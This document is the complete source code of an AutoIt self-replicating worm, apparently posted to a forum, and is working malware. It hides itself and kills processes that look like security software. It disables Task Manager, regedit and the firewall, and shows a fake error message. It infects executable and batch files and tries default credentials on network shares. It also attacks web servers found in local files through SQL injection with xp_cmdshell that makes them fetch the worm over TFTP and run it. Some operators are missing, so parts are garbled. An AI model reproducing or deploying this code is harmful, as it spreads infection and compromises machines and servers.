13 Years of Service
24%
AI.AI-Worm by Mr.Anderson || Project Folder
Code:
>AI.AI-Worm by Mr`Anderson || Project Folder
;AI-Worm(C) by Mr`Anderson/doomriderz
;There's no patch for stupidity
;I think that to exploit men's mind is better than to exploit programs ;>
if not @Compiled then Exit
Opt("TrayAutoPause",0);can't pause the ****** by clicking on the tray icon
Break(0);same
Opt("TrayIconDebug",0)
Opt("TrayIconHide",1);hide tray icon
Opt("RunErrorsFatal",0);don't display fatal errors when running external programs
FixReg();fix the registry
Dim $globalServerList = ""
Dim $globalCheckedSrvLst = ""
Dim $sSessionLinks, $sOldLinks, $sSQLInjectionQuery, $sXpLinks, $tftp_name, $sVectors
Dim $copy_name = @******Name;current copy name
Dim $copy_path = @AutoItExe;current copy path (complete path+name)
Dim $reg_key = "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon";startup key
Dim $reg_val = "Explorer.exe " & $copy_name & " silent";startup key val
Dim $bad_procs[13];list of words to filter processes
$bad_procs[0] = "anti"
$bad_procs[1] = "vir"
$bad_procs[2] = "fix"
$bad_procs[3] = "remov"
$bad_procs[4] = "upd"
$bad_procs[5] = "ack"
$bad_procs[6] = "protect"
$bad_procs[7] = "secur"
$bad_procs[8] = "proc"
$bad_procs[9] = "av"
$bad_procs[10] = "mgr"
$bad_procs[11] = "reg"
$bad_procs[12] = "troj"
If ( @OSTYPE = "WIN32_NT" ) Then;if running under win nt
$check_name = StringLower(RegRead($reg_key,"Shell"));read the startup key
If ( StringLen($check_name) = 0 ) Then;if the key is empty or doesn't exist
$reg_key = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run";change startup method
$reg_val = $copy_path & " silent";fit the key val to the new startup method
$check_name = StringLower(RegRead($reg_key,"Shell"));get the val if already there
EndIf
Else;if not running under win nt
$reg_key = "";use system.ini startup method
$check_name = StringLower(IniRead(@WindowsDir & "\System.ini","boot","shell",""));check the ini
EndIf
If $CmdLine[0]=1 And $CmdLine[1] = "silent" Then;if running with 1 parameter and the parameter is "silent" the we are installed and ready to spread
TCPStartup()
SetStartup();set startup method in order to run every time win starts
If ( @OSTYPE = "WIN32_WINDOWS" ) then;if running under win98/me
DllCall("kernel32.dll","dword","RegisterServiceProcess","dword",@AutoItPID,"dword",1);call kernel's RegServProc in order to hide our process
EndIf
IterateThroughDrives("ALL");go through all drives
While True;our loop
SetStartup();keep writing the registry or the ini file
FixReg();keep fixing the registry
EndBadProcs();keep ending bad precesses
If ( @SEC = 0 And Random(0,1) IterateThroughDrives("REMOVABLE");check rem drives to infect
EndIf
If ( @MIN = 0 ) Then;every hour,
IterateThroughDrives("NETWORK");check net drives to infect
EndIf
If ( @MIN = 0 And Random(0,1) IterateThroughDrives("FIXED");check fixed drives to infect
EndIf
if @IPAddress1"127.0.0.1" then; if a connection is available
Dim $gsl = stringsplit($globalServerList,@lf);split the global server list
if $gsl[0=]=>0 Then;if it is not empty
Dim $nextserver = ""
for $s=1 to $gsl[0];go through it
if $gsl[$s]"" Then;and find the first server
Dim $urlpart = stringsplit($gsl[$s],"/")
if TCPNameToIP($urlpart[3])@IPAddress1 Then;if it doesn't match our same ip
$nextserver = $gsl[$s];select it
ExitLoop;exit the loop
EndIf
EndIf
Next
if $nextserver"" Then;if a valid server was found
Hax($nextserver,"");try to hax it with sql injection!
$globalServerList = stringreplace($globalServerList,@lf&$nextserver,"");delete this server from the list
$globalCheckedSrvLst &= @lf&$nextserver;add the server to a list of checked ones
EndIf
EndIf
Endif
WEnd
EndIf
Dim $vir_body = RunHost();run the host if the worm is being run from an infected file
Dim $show_err_msg = True;show fake error msg on exit
If StringLen($vir_body) = 0 Then;if not running from and infected file
$vir_body = FileRead(@AutoItExe);read ourselves
Else;if ran from inf file,
$show_err_msg = False;do not show the fake err
EndIf
if ( StringLen($check_name) > 0 And $check_name "explorer.exe" ) Then;check if we are already installed or not
Dim $offs = 14;len of explorer.exe and a white space, + 1
if stringleft($check_name,12)"explorer.exe" Then $offs = 0;if we are using the 2nd method to track the sys, zero the offset
$check_name = StringMid($check_name,$offs,10);get the name of the installed worm if present
If ( FileExists($check_name) ) Then Quit($show_err_msg);if it exists, quit
EndIf
ProcessSetPriority(@AutoItPID,4);start going resident by setting our proc's priority to high, so we can do it faster
$copy_name = "";reset copy name
While ( $copy_name = "" );while a valid copy name hasn't been rendomized, do
$copy_name = Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & ".exe";six random chars and .exe extension
For $p=0 To UBound($bad_procs)-1;go through bad procs names
if ( StringInStr(StringLower($copy_name),StringLower($bad_procs[$p]))>0 ) Then;if the random name matches a filter,
$copy_name = "";reset the copy name
ExitLoop;exit loop (randomize another name)
EndIf
Next
WEnd
$tmp_path = @TempDir & "\~" & $copy_name;build a temp path
FileWrite($tmp_path,$vir_body);write there our body
$copy_path = @SystemDir&"\"&$copy_name;build the copy path
If FileExists($copy_path) Then;check if the file already exists
If ProcessExists($copy_name) Then;if it is being run,
ProcessClose($copy_name);close the process
Sleep(2000);sleep 2 secs till the process shuts down
EndIf
FileSetAttrib($copy_path,"-HSR");reset the attribs
FileDelete($copy_path);delete it!
EndIf
FileCopy($tmp_path,$copy_path);copy our temp copy to that location
FileSetAttrib($copy_path,"+HSR");set hidden,system,read only attribs
FileDelete($tmp_path);delete temp copy
Run($copy_path & " silent",@SystemDir);run the copy with the "silent" parameter
Quit($show_err_msg);quit
Func IterateThroughDrives($drive_type);go thru all the drives of the spec type
if ( StringLen($drive_type) = 0 ) Then $drive_type = "ALL";if none is specified, set it to "all"
$dryve_type = StringUpper($drive_type);make it upper case
$drives = DriveGetDrive( $drive_type );list all drives of that type
If NOT @error Then;if no errors,
For $i = 1 to $drives[0];go thru
If ( StringUpper(DriveGetType($drives[$i])) = "NETWORK" ) Then;if drv type is netdrive
$md = DriveMapAdd("*", $drives[$i]);try to map it to the first free drive letter (returned as $md)
If ( @error = 2 Or @error = 6 ) Then;if wrong user or pwd
$md = DriveMapAdd("*", $drives[$i], 0, "Administrator", "");try accessing it as admin with no pwd
If ( @error = 2 Or @error = 6 ) Then;if fails
$md = DriveMapAdd("*", $drives[$i], 0, "Guest", "");try as guest with no pwd
If ( @error = 2 Or @error = 6 ) Then;if fails
$md = DriveMapAdd("*", $drives[$i], 0, "admin", "admin");try as admin with pwd: admin
EndIf
EndIf
EndIf
If ( @error = 0 ) Then ;if drive was mapped
IterateThrough($md);go thru it to infect
DriveMapDel($md);unmap it
EndIf
ElseIf ( StringUpper(DriveStatus($drives[$i])) = "READY" ) Then;if the drive is not a netdrive (so fixed or remov) and it is ready to be read
IterateThrough($drives[$i]);go thru to infect
EndIf
Next
EndIf
EndFunc
Func IterateThrough($dir);goes thru the spec folder and subdirs
If ( Not FileExists($dir) ) Then Return;if it doesn't exist quit
$search = FileFindFirstFile($dir & "\*.*");find first file
If $search = -1 Then Return;if fails ret
Dim $nProb = 1.0;infeciton probability (of exe and scr files only)
While True;we'll exit the loop when we need to
$file = FileFindNextFile($search);find next file
If @error Then ExitLoop;if no more files are found, quit
If ( StringInStr(FileGetAttrib($dir & "\" & $file),"D") = 0 ) Then;if the spec file is not a folder
Dim $ftype = stringlower(stringright($file,3));get file type (first 3 chars from the right)
If ( $ftype="bat" Or $ftype="pif" Or $ftype="cmd" ) Then;w/e it is a batch or pif file,
InfectFile($dir & "\" & $file);infect it
Elseif ( $ftype = "exe" Or $ftype = "scr" ) Then;w/e it is an exe or scr
If ( (StringInStr($file,"setup",false)>0 Or StringInStr($file,"inst",false)>0 Or StringInStr($file,"patch",false)>0 Or StringInStr($file,"fix",false)>0) and Random(0,1) If ( InfectFile($dir&"\"&$file) ) Then; infect it and if infected,
$nProb*=0.75;reduce the infection prob of the exe files in this folder by 1/4
EndIf
EndIf
ElseIf ( $ftype="htm" or $ftype="tml" or $ftype="php" or $ftype="asp" or $ftype="jsp" or $ftype="eml" or $ftype="nws" or $ftype="txt" ) then;if the file may contain any web server address in the format http://servernameorip[/],
Dim $h = FileOpen($dir&"\"&$file,0);open the file in read mode
if $h-1 Then;if success
Dim $fbody = stringreplace(FileRead($h),"\","/");read it and rep all "\" with "/"
if @error=0 Then;if success
For $z=1 to stringlen($fbody)-6;go throu all chars
Dim $flag = stringlower(stringmid($fbody,$z,7))
if $flag = "http://" Then;whenever we find "http://"
Dim $newserv = $flag;find the serv addr
For $k=$z to stringlen($fbody)
Dim $newc = stringmid($fbody,$k,1)
$newserv&=$newc
if $newc="/" or $newc=" " Then
$z=$k
ExitLoop
Endif
Next
$newserv = stringlower($newserv);make it lower case
if (stringinstr($globalServerList,$newserv)=0 and stringinstr($globalCheckedSrvLst,$newserv)=0) Then;if it hasn't already been found
$globalServerList&=@lf&$newserv;write it to the list of servers to hack later...
EndIf
EndIf
Next
EndIf
EndIf
EndIf
ElseIf ( ($file".." and $file".") and (@OSTYPE "WIN32_NT" Or StringLower($file) "dllcache") ) Then;if the file is a directory and it is different from ".." and "." and we are not under winnt or the directory isn't "dllcache",
IterateThrough($dir & "\" & $file);go thru it
EndIf
WEnd
FileClose($search);close search handle
EndFunc
Func RunHost();runs the host program with cmdline and in the context of current working dir by extracting it to the temp folder. then returns the body of the worm (empty if host file was not found)
$body = FileRead(@AutoItExe)
$n = StringInStr($body,"[h0st]")-1
If $n = -1 Then Return ""
$host_body = StringMid($body,$n+7)
$my_body = StringLeft($body,$n)
$host_name = @TempDir & "\" & @******Name
if FileExists($host_name) then FileDelete($host_name)
FileWrite($host_name,$host_body)
Run($host_name & " " & $CmdLineRaw,@WorkingDir)
Return $my_body
EndFunc
Func InfectFile($host);infects a file, by prepending itself to it (very noob, but this way we can also infect batch files and pif files)
If ( Not FileExists($host) ) Then Return False
$ret = True
$time_modified = FileGetTime($host,0,1)
$time_accessed = FileGetTime($host,2,1)
$host_attributes = FileGetAttrib($host)
FileSetAttrib($host,"-HSR")
$host_body = FileRead($host)
$my_body = FileRead(@AutoItExe)
$ret = (StringInStr($host_body,"[h0st]",true) = 0)
If ( $ret ) Then
$handle = FileOpen($host,2)
$ret = ( $handle -1 )
If ( $ret ) Then
$host_body = "[h0st]"&$host_body
FileWrite($handle,$my_body & $host_body)
FileClose($handle)
EndIf
EndIf
FileSetTime($host,$time_modified,0)
FileSetTime($host,$time_accessed,2)
FileSetAttrib($host,$host_attributes)
Return $ret
EndFunc
Func EndBadProcs();if any process name matches one of the filters, ends it
$procs = ProcessList()
For $i=0 To UBound($procs)-1
For $j=0 To UBound($bad_procs)-1
If(StringInStr($procs[$i][0],$bad_procs[$j],false)) Then
ProcessClose($procs[$i][1])
EndIf
Next
Next
EndFunc
Func SetStartup();sets the startup
If( StringLen($reg_key) > 0 ) Then;using the registry (under winnt)
RegWrite($reg_key,"Shell","REG_SZ",$reg_val)
Else;using the system.ini method (under win98/me)
IniWrite(@WindowsDir & "\System.ini","boot","shell",$reg_val)
EndIf
EndFunc
Func FixReg();fixes the regstry
Regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0);to not show hidden system files
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD",1);to disable the registry editor
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD",1);to disable the task mgr
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1);to not show "folder options.." under xplorer.exe's menus
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess","Start","REG_DWORD",4);to disable the windows firewall at startup
EndFunc
Func Quit($bShow)
If $bShow Then MsgBox(16,"Error",@AutoItExe&" is not a valid Win32 application.",20);fake msg
Exit
EndFunc
Func Hax($sBServer,$sSPage);tries to hax a given web server by finding any injectable url or form and trying to inject commands to make the server download and execute remotely our worm
$tftp_name = Int(Random(1000,2000))
$sSQLInjectionQuery = "waitfor delay '0:0:3'; exec master..xp_cmdshell 'tftp.exe -i "&@IPAddress1&" GET worm "&$tftp_name&".exe'; waitfor delay '0:0:5'; exec master..xp_cmdshell '"&$tftp_name&".exe';"
if (Stringlen($sBServer)=0)then Return
if(Stringinstr($sBServer,"://")=0)then $sBServer="http://"&$sBServer
if(Stringright($sBServer,1)"/" and stringright($sBServer,1)"\") then $sBServer = $sBServer&"/"
$sBServer = FormatURL($sBServer)
$sSPage = FormatURL($sSPage)
if ( StringInStr($sSPage,"://")=0 ) then $sSPage = $sBServer & $sSPage
StartSearch($sBServer,$sSPage)
EndFunc
Func StartSearch($sRootServer,$sStartAddress);searches the given address for juicy urls and forms to hack
if (Stringlen($sRootServer)=0)then Return
if(Stringinstr($sRootServer,"://")=0)then $sRootServer="http://"&$sRootServer
if(Stringright($sRootServer,1)"/" and stringright($sRootServer,1)"\") then $sRootServer = $sRootServer&"/"
$sRootServer = FormatURL($sRootServer)
$sStartAddress = FormatURL($sStartAddress)
if ( StringInStr($sStartAddress,"://")=0 ) then $sStartAddress = $sRootServer & $sStartAddress
$StartPageCode = HTTPRequest($sStartAddress)
if ( stringlen($StartPageCode) > 0 ) then
If Analyze($StartPageCode,stringleft($sStartAddress,LastIndexOf($sStartAddress,"/",false)+1),GetResourceName($sStartAddress)) Then
Return
EndIf
EndIf
if stringlen($sSessionLinks)=0 Then
if stringlen($sOldLinks)=0 Then
return
EndIf
$SQLVec = stringsplit($sOldLinks,@lf)
Else
$SQLVec = stringsplit($sSessionLinks,@lf)
$sOldLinks = $sOldLinks&@lf&$sSessionLinks
$sSessionLinks = ""
EndIf
$l=1
$i=int(random(0,1)*($SQLVec[0]-1))+1
While ( $l0) Or (StringInStr($SQLVec[$i],"forum")>0 and Random(0,1) $i=int(random(0,1)*($SQLVec[0]-1))+1
$l+=1
WEnd
If $l Dim $xl = stringsplit($sXpLinks,@lf)
if $xl[0] $sXpLinks &= $SQLVec[$i] & @lf
StartSearch($sRootServer, $SQLVec[$i])
EndIf
EndIf
EndFunc
Func Analyze($sCode,$sRoot,$sResName);analyzes the code searching urls and forms
$sCode = FormatText($sCode)
$CodeLines = StringSplit($sCode, @lf)
Dim $new_url = ""
Dim $bWritingUrl = false
For $ln = 1 to $CodeLines[0]
if ( stringlen($codelines[$ln])>0 ) then
if ( StringInStr(stringlower($CodeLines[$ln]),"0 and not $bWritingUrl ) then
$bWritingUrl = true
$new_url = GetOption("action",$CodeLines[$ln])
$new_url_method = StringUpper(GetOption("method",$CodeLines[$ln]))
if ( Stringlen($new_url_method)=0 ) Then $new_url_method = "GET"
if ( StringInStr($new_url,"?")=0 ) then $new_url = $new_url & "?"
endif
if ( (StringInStr(StringLower($CodeLines[$ln]),"0 or StringInStr(StringLower($CodeLines[$ln]),"0) and $bWritingUrl ) then
$varname = GetOption("name",$CodeLines[$ln])
if ( stringlen($varname)>0 ) then
if ( stringright($new_url,1) "?" ) then $new_url = $new_url & "&"
$new_url = $new_url & $varname & "="
$param_value = GetOption("value",$CodeLines[$ln])
if ( stringlen($param_value)=0 And StringInStr(StringLower($CodeLines[$ln]),"0 ) Then
$o=$ln
Do
$o=$o+1
If ( StringInStr(StringLower($CodeLines[$o]),"0 ) Then
$param_value = GetOption("value",$CodeLines[$o])
EndIf
Until ( stringlen($param_value)>0 Or $o>=($CodeLines[0]-$ln) )
EndIf
$new_url = $new_url & $param_value
endif
endif
if ( StringInStr(StringLower($CodeLines[$ln]),"0 and $bWritingUrl ) then
$new_url = FormatURL($new_url)
if ( StringInstr(Strip($sVectors,"=","&"),Strip($new_url,"=","&"))=0 ) Then
if ( stringleft($new_url,7)"http://" ) Then
$new_url = $sRoot & $new_url
EndIf
$sVectors &= @lf&$new_url&"#"&$new_url_method
if SQLInjection($new_url,$sSQLInjectionQuery,$new_url_method) Then
Return True
endif
EndIf
if ( StringInstr($sOldLinks,$new_url)=0 And StringInstr($sSessionLinks,$new_url)=0 ) Then
if ( stringleft($new_url,7)"http://" ) Then
$new_url = $sRoot & $new_url
EndIf
$sSessionLinks &= $new_url&"#"&$new_url_method&@lf
EndIf
$new_url = ""
$new_url_method = ""
$bWritingUrl = false
endif
$Address = GetOption("href",$CodeLines[$ln])
if( stringlen($Address) = 0 )Then
$Address = GetOption("src",$CodeLines[$ln])
EndIf
if( stringlen($Address) > 0 and StringInStr($Address,"java******:")=0 )Then
$Address = FormatURL($Address)
if ( StringInStr($Address,"?")>0 And StringInStr($Address,"=")>0 And StringInstr(Strip($sVectors,"=","&"),Strip($Address,"=","&"))=0 ) Then
if ( stringleft($Address,7)"http://") Then
$Address = $sRoot & $Address
EndIf
$sVectors &= @lf&$Address&"#GET"
if SQLInjection($Address,$sSQLInjectionQuery,"GET") Then
Return True
EndIf
endif
Dim $ext = stringlower(GetResourceExtension($Address))
if ($ext="" Or $ext="htm" or $ext="html" or $ext="php" or $ext="asp" or $ext="jsp" or $ext="aspx" or $ext="jspx" or $ext="pl" or $ext="cgi") then
if ( StringInstr($sOldLinks,$Address)=0 And StringInstr($sSessionLinks,$Address)=0 ) Then
if ( stringleft($Address,7)"http://" ) Then
$Address = $sRoot & $Address
EndIf
Dim $addrserv = stringlower(Stringleft($Address,Stringlen($sRoot)))
Dim $newserv = stringsplit($addrserv,"/")
Dim $myserv = stringsplit($sRoot,"/")
If ( stringlower($newserv[3])=stringlower($myserv[3]) or $newserv[3]=TCPNameToIP($myserv[3]) or TCPNameToIP($newserv[3])=$myserv[3] ) Then
$sSessionLinks &= $Address&@lf
EndIf
endif
endif
EndIf
EndIf
Next
Return False
EndFunc
Func SQLInjection ( $sVect , $sQuery , $sMethod ); tries sql injection over the given url with the given query
Dim $s = - 1
Dim $sServer = ""
Dim $nPort = 80
if ( Stringlen ( $sVect )= 0 Or Stringlen ( $sQuery )= 0 Or StringInStr ( $sVect , "?" )= 0 ) Then Return False
If ( Stringlen ( $sMethod )= 0 ) Then $sMethod = "GET"
$url_parts = StringSplit ( $sVect , "/" )
$sServer = $url_parts [ 3 ]
if ( StringInStr ( $sServer , ":" )> 0 ) Then
$nPort = Int ( StringMid ( $sServer , StringInStr ( $sServer , ":" )+ 1 ))
$sServer = Stringleft ( $sServer , IndexOf ( $sServer , ":" , false ))
EndIf
$url_parts [ 1 ]= ""
$url_parts [ 3 ]= ""
$sVect = join ( $url_parts , "/" )
$sVect = FormatURL ( $sVect )
$sParams = Stringright ( $sVect , Stringlen ( $sVect )- StringInStr ( $sVect , "?" ))
if ( Stringlen ( $sParams )= 0 Or $sParams = $sVect ) Then Return False
$sVect = Stringleft ( $sVect , StringInStr ( $sVect , "?" ))
$sParams = $sParams & "&"
If StringInStr ( $sParams , "=&" )> 0 Then
Dim $sTmpParams = ""
$TmpParam = Stringsplit ( $sParams , "=&" )
For $t = 1 To $TmpParam [ 0 ]- 1
if stringlen ( $TmpParam [ $t ])> 0 Then
$sTmpParams = $sTmpParams & $TmpParam [ $t ] & "=12345"
if StringInStr ( StringLower ( $TmpParam [ $t ]), "mail" )> 0 Then
$sTmpParams = $sTmpParams & "@a.aa"
EndIf
$sTmpParams = $sTmpParams & "&"
EndIf
Next
$sTmpParams = Stringleft ( $sTmpParams , Stringlen ( $sTmpParams )- 1 )
$sParams = $sTmpParams
Else
$sParams = Stringleft ( $sParams , Stringlen ( $sParams )- 1 )
EndIf
$sVect = $sVect & $sParams
$sParams = StringReplace ( $sParams , "=" ,@ lf )
$sParams = StringReplace ( $sParams , "&" ,@ lf )
Dim $Param = Stringsplit ( $sParams ,@ lf )
$s = TCPConnect ( TCPNameToIP ( $sServer ), $nPort )
If @ error or $s = - 1 Then Return False
Dim $sp = $sServer
if $nPort 80 then $sp = $sp & ":" & $nPort
For $p = 2 To $Param [ 0 ] Step 2
If ( Stringlen ( $Param [ $p ])> 0 ) Then
$sTempVect = StringReplace ( $sVect , $Param [ $p - 1 ] & "=" & $Param [ $p ], $Param [ $p - 1 ] & "=" & $Param [ $p ] & FormatQuery ( "';" & $sQuery & "--sp_password" ))
if ( $sMethod = "GET" ) Then
Dim $query = $sMethod & " /" & $sTempVect & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
Dim $newparams = Stringmid ( $sTempVect , Stringinstr ( $sTempVect , "?" )+ 1 )
Dim $query = $sMethod & " /" & stringleft ( $sTempVect , stringinstr ( $sTempVect , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
if TFTPSession ( 6000 ) then
Return True
EndIf
$s = TCPConnect ( TCPNameToIP ( $sServer ), $nPort )
If @ error or $s = - 1 Then Return False
$sTempVect = StringReplace ( $sVect , $Param [ $p - 1 ] & "=" & $Param [ $p ], $Param [ $p - 1 ] & "=" & $Param [ $p ] & FormatQuery ( ";" & $sQuery & "--sp_password" ))
if ( $sMethod = "GET" ) Then
$query = $sMethod & " /" & $sTempVect & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
$newparams = Stringmid ( $sTempVect , Stringinstr ( $sTempVect , "?" )+ 1 )
$query = $sMethod & " /" & stringleft ( $sTempVect , stringinstr ( $sTempVect , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
if TFTPSession ( 6000 ) then
Return True
EndIf
EndIf
Next
TCPCloseSocket ( $s )
Return False
EndFunc
Func FormatQuery ( $sQ ); formats the sql query to be better injected
if Stringlen ( $sQ )= 0 Then Return( "" )
Dim $sNewQuery
For $c = 1 To Stringlen ( $sQ )
$ch = ""
$ch = Stringright ( Stringleft ( $sQ , $c ), 1 )
$sNewQuery = $sNewQuery & "%" & StringRight ( Hex ( Asc ( $ch )), 2 )
Next
Return( $sNewQuery )
EndFunc
func TFTPSession ( $MAX_WAIT ); starts a tftp session and waits for inputs for the given period of time
Dim $ret = False
Dim $port = 69
Dim $ipaddr =@ IPAddress1
UDPStartup ()
Dim $s = UDPBind ( $ipaddr , $port )
if $s =- 1 Then
Return False
EndIf
Dim $ti = TimerInit ()
while TimerDiff ( $ti ) $recv = UDPRecv ( $s , 512 )
if @ error then
ExitLoop
EndIf
if String ( $recv ) "" then
$recv = stringmid ( string ( $recv ), Stringinstr ( string ( $recv ), "x" )+ 1 )
if ( stringleft ( $recv , 4 )= "0001" ) then ; RRQ
$ret = SendWorm ( $s )
ExitLoop
EndIf
EndIf
WEnd
UDPCloseSocket ( $s )
UDPShutdown ()
Return( $ret )
EndFunc
func SendWorm ( $socket ); send the worm over the net w / e a tftp request is made
if $socket = - 1 then Return
Dim $name = @ AutoItExe
if not FileExists ( $name ) Then
UDPSend ( $socket , BinaryString ( "0x00050001" )& "File not found." & Chr ( 0 ) )
Return False
EndIf
Dim $opcode = "0x0003"
Dim $block = ""
Dim $data = ""
Dim $size = FileGetSize ( $name )
Dim $totblocks = int ( $size / 512 )+ 1
Dim $fhandle = FileOpen ( $name , 0 )
Dim $filedata = FileRead ( $fhandle )
FileClose ( $fhandle )
For $bnum = 0 To $totblocks
$block = Stringright ( String ( Hex ( $bnum + 1 )), 4 )
$data = stringmid ( $filedata ,( $bnum * 512 )+ 1 , 512 )
Dim $packet = BinaryString ( $opcode & $block ) & $data
Do
UDPSend ( $socket , $packet )
if @ error or $socket =- 1 then ExitLoop
Dim $tm = TimerInit ()
Do
Dim $r = UDPRecv ( $socket , 512 )
if @ error then ExitLoop
Until ( stringlen ( string ( $r ))> 0 or TimerDiff ( $tm )>= 5000 )
if (@ error or TimerDiff ( $tm )>= 5000 ) then ExitLoop
Until ( $r = binarystring ( "0x0004" )& BinaryString ( "0x" & $block ) )
Next
Return( $bnum > $totblocks )
EndFunc
Func HTTPRequest ( $sResource ); retrieves the given resource from the internet
Dim $s = - 1
Dim $sServer = ""
Dim $nPort = 80
$sResource = FormatURL ( $sResource )
if ( not IsAnHTTPService ( $sResource ) ) then Return( "" )
Dim $sHTTPMethod = "GET"
If StringInStr ( $sResource , "#" )> 0 Then
$sHTTPMethod = Stringright ( $sResource , Stringlen ( $sResource )- StringInStr ( $sResource , "#" )- 2 )
$sResource = Stringleft ( $sResource , StringInStr ( $sResource , "#" )- 1 )
EndIf
Dim $size = InetGetSize ( $sResource )
If ( $size > 512000 ) Then Return( "" )
if $size = 0 then $size = 512000
$url_parts = StringSplit ( $sResource , "/" )
$sServer = $url_parts [ 3 ]
if ( StringInStr ( $sServer , ":" )> 0 ) Then
$nPort = Int ( StringMid ( $sServer , StringInStr ( $sServer , ":" )+ 1 ))
$sServer = Stringleft ( $sServer , IndexOf ( $sServer , ":" , false ))
EndIf
$url_parts [ 1 ] = ""
$url_parts [ 3 ] = ""
$sResource = join ( $url_parts , "/" )
$sResource = FormatURL ( $sResource )
$s = TCPConnect ( TCPNameToIp ( $sServer ), $nPort )
if @ error Or $s = - 1 then Return( "" )
Dim $sp = $sServer
if $nPort 80 then $sp = $sp & ":" & $nPort
if ( $sHTTPMethod = "GET" ) Then
Dim $query = $sHTTPMethod & " /" & $sResource & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
Dim $newparams = Stringmid ( $sResource , Stringinstr ( $sResource , "?" )+ 1 )
Dim $query = $sHTTPMethod & " /" & stringleft ( $sResource , stringinstr ( $sResource , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
If @ error Then Return( "" )
Dim $ret = ""
While true
Dim $tmpret = TCPRecv ( $s , 2048 )
if @ error Then ExitLoop
if $tmpret "" then
$ret = $ret & $tmpret
endif
WEnd
if ( StringInStr ( $ret , "HTTP/1.1 200" )= 0 and StringInStr ( $ret , "HTTP/1.0 200" )= 0 ) Then
$loc_ndx = StringInStr ( stringlower ( $ret ), "location: " )
if $loc_ndx = 0 then Return( "" )
Dim $lines = StringSplit ( $ret ,@ crlf )
Dim $new_loc = ""
For $j = 1 to $lines [ 0 ]
If stringlower ( stringleft ( $lines [ $j ], 10 )) = "location: " Then
$new_loc = StringMid ( $lines [ $j ], 11 )
ExitLoop
EndIf
Next
if stringlen ( $new_loc )> 0 Then
$ret = HTTPRequest ( $new_loc )
Else
$ret = ""
EndIf
EndIf
Return( $ret )
EndFunc
Func IsAnHTTPService ( $sService ); checks if the resource is pointing to an http protocol or not
$sService = FormatURL ( $sService )
$sServiceType = StringLower ( Stringleft ( $sService , Stringlen ( "http" )))
Return( $sServiceType = "http" )
EndFunc
Func Strip ( $InLine , $flag_char1 , $flag_char2 ); removes all chars between the given two (and them too ) from the given string
$bWrite = true
Dim $sResult
for $n = 0 to Stringlen ( $InLine )
$char = ""
$char = Stringright ( Stringleft ( $InLine , $n ), 1 )
if ( $char = $flag_char1 ) then
$bWrite = False
elseif ( $char = $flag_char2 Or $char = @ lf ) then
$bWrite = True
if $char = @ lf then $sResult = $sResult & @ lf
elseif ( $bWrite ) then
$sResult = $sResult & $char
endif
next
Return( $sResult )
EndFunc
Func LastIndexOf ( $str , $chars , $bCheckCase )
$index = - 1
if ( not $bCheckCase ) then $chars = StringLower ( $chars )
for $ndx = 0 to Stringlen ( $str )
$c = Stringright ( Stringleft ( $str , $ndx ), Stringlen ( $chars ))
if ( not $bCheckCase ) then $c = StringLower ( $c )
if ( Stringlen ( $c ) > 0 and $c = $chars ) then $index = $ndx - Stringlen ( $chars )
next
Return( $index )
EndFunc
Func IndexOf ( $str , $chars , $bCheckCase ); same as stringinstr but returns 1 less
$index = - 1
if ( not $bCheckCase ) then $chars = StringLower ( $chars )
for $ndx = 0 to Stringlen ( $str )
$c = Stringright ( Stringleft ( $str , $ndx ), Stringlen ( $chars ))
if ( not $bCheckCase ) then $c = StringLower ( $c )
if ( $c = $chars ) then
$index = $ndx - Stringlen ( $chars )
ExitLoop
endif
next
Return( $index )
EndFunc
Func FormatText ( $sText ); formats our text to be better searched
$sText = StringMid ( $sText , IndexOf ( $sText , " $sText = Stringreplace ( $sText ,@ Crlf , "" )
$sText = Stringreplace ( $sText , chr ( 13 ), "" )
$sText = Stringreplace ( $sText , chr ( 10 ), "" )
$sText = Stringreplace ( $sText , " Return( $sText )
EndFunc
Func FormatURL ( $sURL ); formats correctly the given url
if Stringlen ( $sURL )= 0 Then Return( $sURL )
$sURL = Stringreplace ( Stringreplace ( $sURL , chr ( 13 ), "" ), chr ( 10 ), "" )
$sURL = StringReplace ( $sURL , "&" , "&" )
$sURL = StringReplace ( $sURL , "\"," / ")
$UrlPart = Stringsplit($sURL," / ")
For $i=1 To $UrlPart[0]-1
if Stringlen($UrlPart[$i])>0 Then
if $UrlPart[$i] = " . " Or $UrlPart[$i] = " .. " Then
$UrlPart[$i] = ""
Else
if $UrlPart[$i+1] = " .. " Then
$UrlPart[$i] = ""
$UrlPart[$i+1] = ""
EndIf
EndIf
EndIf
Next
$sNewURL = join($UrlPart," / ")
While( StringInStr($sNewURL," //")>0 )
$sNewURL = Stringreplace ( $sNewURL , "//" , "/" )
WEnd
